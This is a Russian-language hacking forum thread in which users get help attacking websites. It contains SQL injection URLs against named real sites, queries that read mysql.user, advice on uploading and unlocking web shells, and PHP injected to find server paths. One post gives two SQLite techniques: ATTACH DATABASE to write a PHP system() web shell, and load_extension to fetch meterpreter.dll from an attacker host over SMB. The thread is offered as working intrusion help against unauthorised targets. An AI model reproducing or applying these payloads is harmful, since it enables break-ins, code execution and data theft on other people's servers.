Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    m.gortransperm.ru/time-table/12+order+by+1/13403 pgsql , order by 1 с ошибкой?!
     
  2. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Code:
    http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+--
    Логинов/паролей нету, как и самой админки
    Code:
    http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+from+mysql.user--
    Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Во первых, у вас нет ни файловых привилегий, ни доступа к mysql.user, с чего вы вообще решили возможность в таком случае файловых привилегий?!

    Во вторых, в бд ничего нет похожего связаного с доступом к админке
     
    _________________________
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://site.ru/index.php?http://myserver.ru/sys12.txt
    вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
    при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
    вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
    пытаюсть залиться туда wgetом - результата нет
    пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(

    сервак поидее можно порутать, FreeBSD 3.3-RELEASE
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Попробуй залить шелл без пасса...
     
    _________________________
    2 people like this.
  6. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    попробуй убери из кода шелла саму авторизацию,бывает помагает
     
    #21486 Faaax, 30 Nov 2012
    Last edited: 30 Nov 2012
    1 person likes this.
  7. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    в каких шеллах можно отключить авторизацию поменяв значение переменной по типу
    auth_enabled=false;?
     
  8. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    попробуй этот
    http://pastebin.com/c35GqLPx
     
    #21488 Faaax, 30 Nov 2012
    Last edited: 30 Nov 2012
    1 person likes this.
  9. igumenov

    igumenov New Member

    Joined:
    12 Sep 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Как можно использовать эту ошибку?
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    + поставь действие по умолчанию в шелле - консолька, и через неё совершай действия.

    Минимум - раскрытие путей, максимум - возможная инъекция в LIMIT 1,[inject]. Но надо смотреть.
     
    _________________________
  11. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    Помогите.
    выполнил sql запрос как написано тут http://forum.antichat.ru/showpost.php?p=2064084&postcount=25
    Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь
     
  12. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?
     
  14. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    ну если б вы внимательно читали пост M1ks, то не задавали бы такой "умный" вопрос.
    Он написал, что сделал sql запрос
    из этого поста http://forum.antichat.ru/showpost.php?p=2064084&postcount=25
    Теперь ему надо залить шелл, а путь не знает
    по скольку он сделал этот sql запрос, можно узнать путь: profile.php?mode=editprofile&c=echo realpath("."); или вывести инфу пхп mode=editprofile&c=phpinfo(); и там смотреть путь.
     
    2 people like this.
  15. nijat11

    nijat11 New Member

    Joined:
    17 Jun 2011
    Messages:
    18
    Likes Received:
    0
    Reputations:
    5
    доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать
     
  16. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.swtravel.az/index.php?stype=a&slevel=1&sid=-11%20union%20select%20@@version,2,3--
     
  17. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    инъекция в SQLite. Обычная UNION-based.


    Никогда с ними не сталкивался. Таблы вытянул из sqlite_master. Как вытянуть колонки?

    Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()
    Но не совсем понял, как он работает. Дайте доков по сабжу.
     
    #21497 Pirotexnik, 4 Dec 2012
    Last edited: 4 Dec 2012
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    2 способа получения шелла на SQLite

    Getting Shell Trick 1 - ATTACH DATABASE

    What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example:

    ?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;--

    Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer.

    Теперь по-русски. Приведённый запрос пытается подключить дополнительную БД ( указанную в файле /var/www/lol.php ) в твой запрос к БД. Если этот файл отсутствует, он автоматически создастся - то, что нам и надо.

    Зависимости:

    MQ=off
    Full_path_disclosure=1


    Getting Shell Trick 2 - SELECT load_extension

    Takes two arguments:
    A library (.dll for Windows, .so for NIX)
    An entry point (SQLITE_EXTENSION_INIT1 by default)
    This is great because
    This technique doesn't require stacked queries
    The obvious - you can load a DLL right off the bat (meterpreter.dll? :)

    Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example:

    ?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

    В этом примере используется Samba протокол для доступа к хосту злоумышленника, где в качестве плагина для SQLite скачаивает "ядовитую" начинку. Тут нужно обратить внимание с какой ОС Вы имеете дело - либо Windows (тогда расширение у файла должно быть .dll ), либо Unix (расширение .so соответственно).

    Proof = _ttps://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
     
    _________________________
  19. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Добрый день, помогите новичку
    Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.
    Спасибо
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Если у тебя права только на чтение файлов, то единственное что ты можешь делать - читать файлы :)
     
    _________________________
Thread Status:
Not open for further replies.